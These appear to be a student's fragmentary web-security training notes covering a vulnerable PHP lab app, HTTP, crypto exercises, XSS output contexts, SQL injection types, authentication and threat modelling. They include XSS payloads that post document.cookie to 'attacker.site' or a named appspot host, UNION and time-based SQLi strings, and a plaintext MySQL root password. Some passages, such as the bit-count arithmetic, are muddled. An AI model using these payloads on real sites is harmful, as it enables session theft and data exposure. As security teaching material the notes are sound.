https://www.virtualbox.

org/

Ubuntu OVA
`
https://drive.google.com/file/d/1HQB0SSlvKiTEQelPizMKAXCA68gccB4h/view

Bridge mode
Find out VM ip address
Ifconfig
Ipconfig

Try to access apache server via host machine browser

/etc/init.d/apache2 status

Php -version

mysql -u root -p

Enter password: happy123$

Nautilus

/var/www/html/sepwebapp/<code>

Sudo nautilus

https://github.com/krishnareddypadala/

Php

Pick up username and password

Verify username and password if it is correct or not

Correct ----> Userlogged in

Not correct ----> Username or password is wrong

Connect to db from terminal

Show databases
Use a db
Show tables
Select a table based condition

Create a db
Create tb

Tell about yourself? 20 mins

Sql
XSS
CSRF
Authen
XXE
Crypto
BurpSuite
IBMApp/WebInspect

200 mins

6 mins
5*4=20 mins
26 mins
https://github.com/krishnareddypadala/phpvulnbank

Login.html
Usercheck.php
singout.php
Profile.php
Feedback.php
Feedback_user.php
Feedback_admin.php
Transfer.php
Register.html
Register.php

Transfer.php

Inputs
Fuser< ------- $_session[“uname”]
Toacno←--- User input
Tamnt ←--- User input
Process
Fuser,tacno,tamnt

Outputs

uname=krishna&pwd=happy123%24&login=Login

XML

Conversion of data into a format is called? Serialisation

From format into variable is called? Deserialization

Data ---->XML transport to server XML ----> Data

<acno>1</scno>
<username>krishna</username>

JSON key:value

acno:1,username:krishna

Data ----> JSON transport to server JSON -----> Data

DataJSON<------Data <-----JSON Send JSON back to browser

SOAP Requests
JSON Requests

<?xml version="1.0" encoding="UTF-8"?>

<root>
<name>phani</name>
<password>happy2$</password>
<email>​[email protected]​</email>
<tel>9876543210</tel>
</root>
POST /sepwebapp/usercheck.php HTTP/1.1
Host: krishnarp.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:69.0) Gecko/20100101 Firefox/69.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 41
Connection: close
Referrer: http://krishnarp.com/sepwebapp/login.html
Upgrade-Insecure-Requests: 1

uname=krishna&pwd=happy123%24&login=Login

METHOD URL HTTP 1.1

GET,POST,OPTIONS,PUT,DELETE,HEAD,TRACE,CONNECT

Php

_Request ←--- GET and POST

_GET ←--- GET (POST will cause error)
_POST ←--- POST ( GET will cause error)

Try to change the method to GET from post when you are sending critical info like passwords
and if it is allowed to mark it as vulnerability.

demo.testfire.net
Jsmith
Demo1234

http://zero.webappsecurity.com/login.html

username password
http://testphp.vulnweb.com/
test & test

Find out which all method supported by demo.testfire.net ,zero web sec,vulnweb with the help
options method?

Check for POST to GET method change?

OPTIONS? ----> DELETE/PUT/TRACE
Demo testfire zero webb vulnweb

Screenshot inside document?

Response

HTTP/1.1 200 OK
Date: Wed, 09 Oct 2019 03:04:06 GMT
Server: Apache/2.4.27 (Ubuntu)
Vary: Accept-Encoding
Content-Length: 458
Connection: close
Content-Type: text/html; charset=UTF-8

<html>

<h1>Transfer</h1>

<form name="transfer" action="transfer.php" onsubmit="return checkInp()" method="POST">

Tacount num:<input type="text" name="tacno"> <br><br>

Tamnt:<input type="text" name="tamt"><br><br>
<input type="submit" value="transfer">

<script>
function checkInp()

var x=document.forms["transfer"]["tacno"].value;
 if(isNaN(x))
{
document.write(x+" is not a number");
return false;
}

</script>

</form>

</html>

1XX --- Continue/Switching protocol

2XX -- OK
3XX -- Redirect
4XX -- Not found
5XX -- Server Side errors

Interview

Tell me about yourself?

JIRA/SNOW receive

ENvironment & Test creds&WalkT < --- inputs

DAST

Automated IBM Appscan /HP Webinspect

RUn the -->Vulnerabilities----> Eliminate False positives ---> Vulnerabilities can be
reported

Manual Vulnerability assessment ---> Extra vulnerabilities ---> Vulnerabilities

Create report ----> sent to developer ----> Read out calls

----> Developer ---> Delivered
Developer ----> Re test --- Revalidate ---> closed ------>Good Go
Ticket

Tell me about yourself ---> 20 points --- 10 mins

Sqli --- 50 points --- 10 mins

Xss
Csrf
AuthN
authZ

10* 10 ----> 100 mins 1hr :40 mins

500 points notes

Tell about yourself? 5 mins

5 * 5 mins==25 mins 30 mins

50 MB

A ----------------------------------------------------------------> B
Video ----enc --->Cipher V--------------> Cipher V ------Dec -----> Video

Time enc/dec ------ 1 MB -- 1sec

AES Pre shared key 256 bits?

Video----- enc+key------>Cipher --------->dec ----------Video

50sec 50 sec

100sec

RSA
video------ enc enc ----- Cipher --------dec dec ------ Video

50+50 50+50
200 sec

Key -- 256 bits

0100001010010010010100100100100101010101001001110101010011

1 MB -- 1 sec

1025KB
1024*1024B
1024*1024*8 bit --
8388608 bit -- 1sec
256 bit -----------?0.00003 sec
Sym
AES(Data)+Key ------------------------- AES(DATA) 100 sec

Assym
RPb(JPr(key))------------------------------>RPb(JPr(key))
.00003+.00003 0.00003+0.00003=0.00012 sec

100.00012 sec
(a+b)+c=a+(b+c)
5 8

6+5-->11+8--->19
11

6+8---> 14 ----+5----->19

6,11,14

19

17%4=1
25%4=1

11+14-6

Hello Krishna, Have good day

Md5--- hash
RSA --- Encrypt the hash with private key

http://onlinemd5.com/

https://www.devglan.com/online-tools/rsa-encryption-decryption
RSA-Pb,,

MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCZ/W0j1nv3Hbel4vZjDSyxV6Xt6fkLpH7
ek++uQqKqynORgYAsWdPRuC2uOUH9jsVli6UOlYh1w8zKIwZX3B0YQbnXLcdy9zr3ygWkXZK
FZaXFIYCpGIR/vutjwLKr424/B+KAmnAgXYUqEhS4uCEN5AH9aXDqson9z75kjGtHDQIDAQA
B

RSA-Pr(key)

ZlM5QdLmowtyeuW0mGXqMtX2qJmjyJnMqOsbZJdVCQGc2BsK6sjv5Up5WcBpLz0AyHwFMr
Uq5j6DiV7/vp1qXxI3nVY/mpKlsrVSs6Tl7YbeafcVt3W5/ZmST0O8NhjzYVWUrzkSMHQSuIZ0B
EshIzOo8zGkNWz2MekeNI3uux4=

KeyCipher ------->RSA+Pb ------------------>key --- sunday

AES-key(msg)
r8gxRP6Fc7g5G9hry3ZD52mwZsiIUdR/PeGb2pVqtC5NOlQbiDJwNWgeDu/lbIsqhb03dZMhWP
4IvgT2hQsO7w==

Ciphertext -----------AES+​key​------------------>Clear text

https://www.devglan.com/online-tools/rsa-encryption-decryption
https://aesencryption.net/

Calculate 3+6*5-4/2-1 and submit answer as flag form.

3+6*5-4/2-1
30
Hello Krishna

2bits -- binary

00
01
10
11

3 bits -- 2^128
000
001
010
100
101
111

Secure Protocol: Tls12

Cipher: Aes128 128bits
Hash Algorithm: Sha256 ?bits
Key Exchange: ECDHE_RSA (0xae06) 255bits

Cross Site Scripting - XSS

https://www.ssllabs.com/ssltest/

IBM Appscan

https://www.dropbox.com/s/jqku41tj2k60odb/AppScan_Std_9.0.3.4_Eval_Win.exe?dl=0

https://demo.testfire.net

1) Simple HTML Context

In the body of an existing HTML tag or at the start and end of the page outside of the <html> tag.

<some_html_tag> ​user_input​ </some_html_tag>

In this context you can enter any kind of valid HTML in the user input and it would immediately be
rendered by the browser, its an executable context.

Eg:​ <img src=x onerror=alert(1)>

<script>alert(11)</script>

2) HTML Attribute Name Context

Inside the opening HTML tag, after the tag name or after an attribute value.

<some_html_tag ​user_input​ some_attribute_name="some_attribute_value"/>

In this context you can enter an event handler name and JavaScript code following an = symbol and we
can have code execution, it can be considered to be an executable context.

Eg:​ onclick="alert(1)"
<input type=”text” name=”unmae”>
<input onmouseover=”alert(111)” type=”text” name=”uname”>

3) HTML Attribute Value Context

Inside the opening HTML tag, after an attribute name separated by an = symbol.

<some_html_tag some_attribute_name="​user_input​" />

<some_html_tag some_attribute_name='​user_input​' />
<some_html_tag some_attribute_name=​user_input ​/>

There are three variations of this context:

- Double quoted attribute
- Single quoted attribute
- Quote less attribute

Code execution in this context would depend on the type of attribute in which the input appears. There
are different types of attributes:

a) ​Event attributes

These are attributes like onclick, onload etc and the values of these attributes are executed as JavaScript.
So anything here is the same as JavaScript context.

b) ​URL attributes

These are attributes that take URL as a value, for example src attribute of different tags. Entering a
JavaScript URL here could lead to JavaScript execution

Eg:​ javascript:some_javascript()
javascript:alert(111)

c) ​Normal attributes

If the input appears in a normal attribute value then this context must be escaped to lead to code
execution. If the attribute is quoted then the corresponding quote must be used to escape the context. In
case of unquoted attributes space or backslash should do the job. Once out of this context a new event
handler can be added to lead to code execution.

Eg:
" onclick=alert(1)
' onclick=alert(1)
onclick=alert(1)
4) HTML Comments Context
Inside the comments section of HTML

<!-- some_comment ​user_input​ some_comment -->

This is a non-executable context and it is required to come out this context to execute code. Entering a
--> would terminate this context and switch any subsequent text to HTML context.

Eg:​ --><img src=x onerror=alert(1)>

5) JavaScript Context

Inside the JavaScript code portions of the page.

<script>
some_javascript
user_input
some_javascript
</script>

This applies to the section enclosed by the SCRIPT tags, in event handler attributes values and in URLs
preceding with javascript: .

Inside JavaScript user input could appear in the following contexts:

a) Code context
b) Single quoted string context
c) Double quoted string context
d) Single line comment context
e) Multi-line comment context

If user input is between SCRIPT tags then, no matter in which of the above contexts it appears you can
switch to the HTML context simply by including a closing SCRIPT tag and then insert any HTML.

Eg:​ </script><img src=x onerror=alert(1)>

If you are not going to switch to HTML context then you have to tailor the input depending on the specific
JavaScript context it appears in.

a) ​Code Context

function dev_func(input) {some_js_code}

dev_func(​user_input​);
some_variable=123;

This is an executable context, user input directly appears as an expression and you can directly enter
JavaScript statements and they will be executed.
Eg:​ $.post("​http://attacker.site​", {'cookie':document.cookie}, function(){})//

b) ​Single quoted string context

var some_variable='​user_input​';

This is a non-executable context and the user input must include a single quote at the beginning to switch
out of the string context and enter the code context..

Eg:​ '; $.post("​http://attacker.site​", {'cookie':document.cookie}, function(){})//

c) ​Double quoted string context

var some_variable="​user_input​";

This is a non-executable context and the user input must include a double quote at the beginning to
switch out of the string context and enter the code context..

Eg:​ "; $.post("​http://attacker.site​", {'cookie':document.cookie}, function(){})//

d) ​Single-line comment context

some_js_func();//​user_input

This is a non-executable context and the user input must include a new line character to terminate the
single line comment context and switch to the code context..

Eg:​ \r\n$.post("​http://attacker.site​", {'cookie':document.cookie}, function(){})//

e) ​Multi-line comment context

some_js_func();
/*
user_input
*/
some_js_code

This is a non-executable context and the user input must include*/ to terminate the multi-line comment
context and switch to the code context..

Eg:​ */$.post("​http://attacker.site​", {'cookie':document.cookie}, function(){})//

f) ​Strings being assigned to Executable Sinks

These are single quoted or double quoted string contexts but the twist is that these strings are passed to
a function or assigned to a property that would treat this string as executable code.
Some examples are:
eval("​user_input​");
location = "​user_input​";
setTimeout(1000, "​user_input​");
x.innerHTML = "​user_input​";
.write(“​user_input​”)

For more sinks refer the ​DOM XSS wiki​.

This should be treated similar to Code context.

5) CSS Context

Inside the CSS code portions of the page.

<style>
some_css
user_input
some_css
</style>

<style width=”100px”></style
This applies to the section enclosed by the STYLE tags and in style attributes values.

Injecting CSS in to a page itself could have some kind of impact of the page. For example, by changing
the location, visibility, size and z-index of the elements in a page it might be possible to make the user
perform an action different from what they think they are doing.

But the more interesting aspect is in how JavaScript can be executed from within CSS. Though, not
possible in modern browsers older browser did support JavaScript execution in two ways.

i. ​expression property
expression is a Internet Explorer only feature that allows execution of JavaScript embedding inside CSS.

css_selector
{
property_name: expression(some_javascript);
}

ii. ​JavaScript URLs

Some CSS properties like the background-image property take an URL as their value. In older browsers,
entering a JavaScript URL here would result in JavaScript code being executed.

css_selector
{
background-image: javascript:some_javascript()
}

<input type="text" name='uname' value='​test​'>

<input type="text" name='uname' value='​T’ onmouseover=’alert(1111)​'>
T’ onmouseover=’alert(1111)

https://github.com/0xsobky/HackVault/wiki/Unleashing-an-Ultimate-XSS-Polyglot

<script>location.href=​"​http://krishnasectest.appspot.com​?cook="+document.co
okie​;</script>

<​img
src​="​https://image.shutterstock.com/image-photo/anonymous-hacker-with
out-face-uses-260nw-781107184.jpg​"​ ​>

XSS Notes 30 to 50 points--- 9th Confirm it on Whatsapp

What is XSS with diagram?

What are the different types of XSS with examples and diagrams?
What is reflected XSS?
What is Stored XSS?
What is DOM based XSS?
How do you identify XSS and explain 3 output contexts with examples?
How do you stop XSS?
What is the difference between whitelisting and black listing?
Where do you keep input validation? CLient side or server side?
What is output encoding and explain with examples?
What are polyglot provide example polyglots?
XSS Audio -- New audio required by every one -- 16th Nov
Not only sql+
Mysql -- sql
Mangodb -- json
Nosql

SQL Injection
When user/attacker injects sql queries instead of data , the query will be sent to the database as
part of dynamic query and data will be executed as code which is called sql injection

In-band SQLi

In-band SQL Injection occurs when an attacker is able to use the same communication channel
to both launch the attack and gather results.

Error-Based:
 Error-based SQLi is an in-band SQL Injection technique that relies on error messages
thrown by the database server to obtain information about the structure of the database.

Union Based Injection

Union-based SQLi is an in-band SQL injection technique that leverages the UNION SQL
operator to combine the results of two or more SELECT statements into a single result which is
then returned as part of the HTTP response.

Select * from banktable where acno=’​a ‘ UNION SELECT * from empsaltable;#​’;

$acno=a ‘ UNION SELECT * from empsaltable;#

SELECT * from empsaltable;

SELECT * FROM banktable WHERE acno=​a’ AND ‘1’=’2’ UNION SELECT * FROM banltable
where acno=5

Select * from cbanktable where acno=”aid”;

Aid
A” and 1=2 UNION select * from cbanktb;

Select * from cbanktable where acno=”​A” and 1=2 UNION show tables​”;

Union select * from cabanktb”;

Inferential SQLi (Blind SQLi)

In an inferential SQLi attack, no data is actually transferred via the web application and the
attacker would not be able to see the result of an attack in-band (which is why such attacks are
commonly referred to as “blind SQL Injection attacks”).

Blind-boolean-based(content-based) SQLi

Blind-time-based SQLi

Boolean-based (content-based) Blind SQLi

Boolean-based SQL Injection is an inferential SQL Injection technique that relies on sending an
SQL query to the database which forces the application to return a different result depending on
whether the query returns a TRUE or FALSE result.

Depending on the result, the content within the HTTP response will change, or remain the
same. This allows an attacker to infer if the payload used returned true or false, even though no
data from the database is returned. This attack is typically slow (especially on large databases)
since an attacker would need to enumerate a database, character by character.

Time-based Blind SQLi

Time-based SQL Injection is an inferential SQL Injection technique that relies on sending an
SQL query to the database which forces the database to wait for a specified amount of time (in
seconds) before responding. The response time will indicate to the attacker whether the result
of the query is TRUE or FALSE.

Depending on the result, an HTTP response will be returned with a delay, or returned
immediately. This allows an attacker to infer if the payload used returned true or false, even
though no data from the database is returned. This attack is typically slow (especially on large
databases) since an attacker would need to enumerate a database character by character.

Sqlserver ---- ​WAIT FOR DELAY '00:00:15'

Mysql ​SLEEP()​ and ​BENCHMARK()

Working eg # http://krishnarp.com/marwebapp/retrivedata.php?sno=1 and SLEEP(3)

If username=”root” delay ‘00:00:10’ ’

Out-of-band SQLi

Out-of-band SQL Injection is not very common, mostly because it depends on features
being enabled on the database server being used by the web application. Out-of-band SQL
Injection occurs when an attacker is unable to use the same channel to launch the attack and
gather results.

Out-of-band SQLi techniques would rely on the database server’s ability to make DNS or HTTP
requests to deliver data to an attacker. Such is the case with Microsoft SQL Server’s xp_dirtree
command, which can be used to make DNS requests to a server an attacker controls; as well as
Oracle Database’s UTL_HTTP package, which can be used to send HTTP requests from SQL
and PL/SQL to a server an attacker controls.

1 or Utl_Http.request(‘​http://google.com​”)

First Order The attacker can simply enter a malicious string and cause the
Attack modified code to be executed immediately.

Second The attacker injects into persistent storage (such as a table

Order row/cookie) which is deemed as a trusted source. An attack is
Attack subsequently executed by another activity.

Lateral The attacker can manipulate the implicit function ​To_Char()

Injection. by changing the values of the environment variables,
NLS_Date_Format ​or​NLS_Numeric_Characters​.

[^a-z,A-Z,0-9]

0x22---> >

To_char(0x22) --->”

0x22:10:50

NLS_Date_Format(“:10:50)
Sqlmap

Sniper ---> one payload at a time

Battering Ram ---> Same payload in all positions

Pitch fork → It will take sets of payload that are equal to

positions and map them one to one

Cluster Bomb ---> all permutations and combinations It will take..

https://github.com/zaproxy/zaproxy/wiki/Downloads

Java and .net

Cprng

AuthN

Recognise user/person/process

Login form → Forms based authentication

Brute force

-- Captcha

-- Lock the user after 3/10 failure -- 24

 --- 3 wrng pwd -- 10 mins

--- 4 wrong pwd --- 20 mins

---- Captcha+Lock

---- Keyloggers

Virtual Key boards

Two factor Authentication

Forms Login + OTP over phone --- 2 fact

Forms Login + OTP over email -- 2 fact

Form login + Security questions --- Not 2 fact

AuthZ

Allowed or Not

Introduction to authorization
Horizontal privilege escalation
Vertical privilege escalation
IDOR
SDLC

Requirement Gathering -----> Design ----> Coding ----> Testing ---->

Deployment ----> Maintenance

S-SDLC

RG ---BA --- Users -- Functional requirements +Security Require

Tech Architect --- php/mysql/apache -- Threat Modelling

Coding ---- Develop application --- SAST

Testing ---- Check If requirements are met or not --- DAST

Deploy and Maintain --- PT

THreat Modelling

STRIDE

S-- spoofing --- AuthN

Forms based,Multi fact,NTLM,Cert,AuthN services

T-- Tampering

Encrypt/Digital Signatures

R-- Repudiation

AuthN --- Logging some to recognise user

I -- Info Disclosure

D- DOS

E -- Elevation of privs

Risk = Likelihood vs Impact